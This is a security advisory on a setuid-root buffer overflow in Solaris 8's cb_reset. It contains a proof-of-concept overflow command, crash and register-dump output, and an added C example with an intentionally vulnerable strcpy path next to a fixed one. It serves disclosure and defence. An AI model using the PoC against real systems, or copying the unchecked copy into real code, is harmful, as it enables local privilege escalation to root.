Security Vulnerability
Solaris cb_reset Local Buffer Overflow Vulnerability

Published: 2001-06-20
Updated: 2001-07-03

Affected systems:

Sun Solaris 8.0 (SPARC, with the SUNWssp package installed)
Description:

BUGTRAQ ID: 2893
CVE(CAN) ID: CVE-2001-0699

The cb_reset program shipped in the SUNWssp package (the Sun Enterprise 10000 System Service Processor software) contains a local buffer overflow.

Passing an over-long argument to cb_reset on the command line (about 600 characters or more; the proof of concept below uses exactly 600) overflows a fixed-size buffer. The register dump in the test section shows the saved frame pointer and return address overwritten with the attacker's input, so the bug is controllable rather than a plain crash. Because the program is installed setuid root, any local user can exploit it to obtain root privileges.

<*Source: Pablo Sor (psor@afip.gov.ar) *>


Test method:

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!


Pablo Sor (psor@afip.gov.ar) provided the following test steps:

$ uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10

$ ls /tftpboot/cb_port
/tftpboot/cb_port

$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
Resetting host
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ether_hostton(SrcHost:laika): No such file or directory
ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA): No such file or directory
Bus Error (core dumped)

$ gdb /opt/SUNWssp/bin/cb_reset --core=core
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)...
Core was generated by `/opt/SUNWssp/bin/cb_reset
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus Error.
Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
(no debugging symbols found)...done.
Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
Reading symbols from /opt/SUNWssp/lib/liblogger.so...
(no debugging symbols found)...done.

[...]

Loaded symbols for /usr/lib/nss_files.so.1
#0  0x1219c in cb_send_frame ()
(gdb) info registers
g0             0x0      0
g1             0xff195b80       -15115392
g2             0xff322630       -13490640
g3             0xff332d78       -13423240
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x13278  78456
o1             0xff1bbab8       -14959944
o2             0xff1b8018       -14974952
o3             0x13278  78456
o4             0x13258  78424
o5             0xffbedb71       -4269199
sp             0xffbedb18       -4269288
o7             0x1218c  74124
l0             0xc3c3c3c3       -1010580541
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x4141414d       1094795597
i5             0x41414141       1094795585
fp             0x41414141       1094795585
i7             0x41414141       1094795585  (***)
y              0xb      11
psr            0xfe801001       -25161727
wim            0x0      0
tbr            0x0      0
pc             0x1219c  74140
npc            0x121a0  74144
fpsr           0x0      0      
cpsr           0x0      0
(gdb)
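The register dump above is the interesting part: on SPARC the callee's stack frame holds the caller's saved register window, so a stack buffer that overruns its frame reaches the saved frame pointer (fp/i6) and return address (i7), both of which read 0x41414141 here, the attacker's 'A' bytes. The following is an added illustration written for this page, not cb_reset's own source (which is not public here): it mimics the bug class, an argv[] string copied into a fixed-size stack buffer without a length check, next to the bounds-checked form a fix would use. The function names, the 64-byte buffer size and the --unsafe switch are hypothetical.

```c
/* Added example for this advisory, not code from cb_reset or Sun.
 * Models the vulnerability class only: an argv[] string copied into a
 * fixed-size stack buffer. Buffer size and names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOSTNAME_MAX 64   /* hypothetical; cb_reset's real size is unknown */

/* Vulnerable pattern: strcpy() writes past the end of `host` when the
 * argument is longer than HOSTNAME_MAX - 1 bytes, clobbering whatever
 * sits above the buffer in the frame (on SPARC, the caller's saved
 * window, including fp and the i7 return address). Only safe with
 * short input; exists here to show the bug, not to be called blindly. */
void vulnerable_set_dsthost(const char *arg)
{
    char host[HOSTNAME_MAX];
    strcpy(host, arg);                 /* no bounds check */
    printf("Resetting host %s\n", host);
}

/* Hardened form: refuse anything that does not fit (leaving room for the
 * terminating NUL), then copy with an explicit length.
 * Returns 0 on success, -1 if the argument is too long. */
int hardened_set_dsthost(const char *arg, char *out, size_t outsz)
{
    size_t n = strlen(arg);
    if (n >= outsz)
        return -1;
    memcpy(out, arg, n + 1);
    return 0;
}

/* Returns 1 if the hardened path accepts `arg`, 0 if it rejects it. */
int dsthost_accepts(const char *arg)
{
    char host[HOSTNAME_MAX];
    return hardened_set_dsthost(arg, host, sizeof host) == 0;
}

/* Constructed sample input: the same `len`-byte "AAAA..." argument the
 * advisory's PoC passes (600 bytes). Caller frees the result. */
char *make_poc_arg(size_t len)
{
    char *p = malloc(len + 1);
    if (p == NULL)
        return NULL;
    memset(p, 'A', len);
    p[len] = '\0';
    return p;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : "laika";
    char host[HOSTNAME_MAX];

    /* "--unsafe" as the second argument runs the vulnerable copy so the
     * overflow can be reproduced on a scratch build. */
    if (argc > 2 && strcmp(argv[2], "--unsafe") == 0) {
        vulnerable_set_dsthost(arg);
        return 0;
    }
    if (hardened_set_dsthost(arg, host, sizeof host) != 0) {
        fprintf(stderr, "cb_reset: host name too long (max %d bytes)\n",
                HOSTNAME_MAX - 1);
        return 1;
    }
    printf("Resetting host %s\n", host);
    return 0;
}
```

Running the hardened path with the PoC argument (`./demo "$(perl -e 'print "A"x600')"`) exits with an error instead of corrupting the stack; adding `--unsafe` reproduces the overflow class, although on a modern compiler and CPU it will typically end in a stack-protector abort or SIGSEGV rather than SPARC's Bus Error.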


Recommendations:

Workaround:

Remove the setuid bit from cb_reset (afterwards, `ls -l /opt/SUNWssp/bin/cb_reset` should no longer show an `s` in the owner execute position):
# chmod a-s /opt/SUNWssp/bin/cb_reset

Vendor patch:

None available at the time of writing.



This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.